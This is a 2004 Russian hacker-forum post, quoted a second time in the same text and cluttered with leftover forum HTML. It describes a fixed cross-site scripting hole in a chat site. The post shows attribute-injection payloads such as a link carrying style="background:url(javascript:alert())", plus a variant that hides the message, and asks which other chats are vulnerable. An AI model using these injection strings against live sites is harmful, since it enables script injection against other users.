Format C:
28.06.2004, 11:15
в чате nashchat.ru нашёл уязвимость:
если пишешь что-то типа </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru[/QUOTE]<span id='postcolor'> то это преобразуется в ссылку. В чате отоброжается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru">http://www.somechat.ru</a>
[/QUOTE]<span id='postcolor'>
А если так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru"style="background:url(javascript:alert ())
[/QUOTE]<span id='postcolor'>
А чтоб твоё сообщение не было видно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>[/QUOTE]<span id='postcolor'>
Тогда в чате отображается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`></a>
[/QUOTE]<span id='postcolor'>
Проблема в том, что в скрипте нельзя использовать пробелы(& не пропускается). Сейчас баг исправили, но я думаю что такую фигню можно сделать на некоторых других чатах. (Ни кто не знает на каких? http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif )
"'`<>\%&
если пишешь что-то типа </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru[/QUOTE]<span id='postcolor'> то это преобразуется в ссылку. В чате отоброжается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru">http://www.somechat.ru</a>
[/QUOTE]<span id='postcolor'>
А если так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru"style="background:url(javascript:alert ())
[/QUOTE]<span id='postcolor'>
А чтоб твоё сообщение не было видно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>[/QUOTE]<span id='postcolor'>
Тогда в чате отображается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`></a>
[/QUOTE]<span id='postcolor'>
Проблема в том, что в скрипте нельзя использовать пробелы(& не пропускается). Сейчас баг исправили, но я думаю что такую фигню можно сделать на некоторых других чатах. (Ни кто не знает на каких? http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif )
"'`<>\%&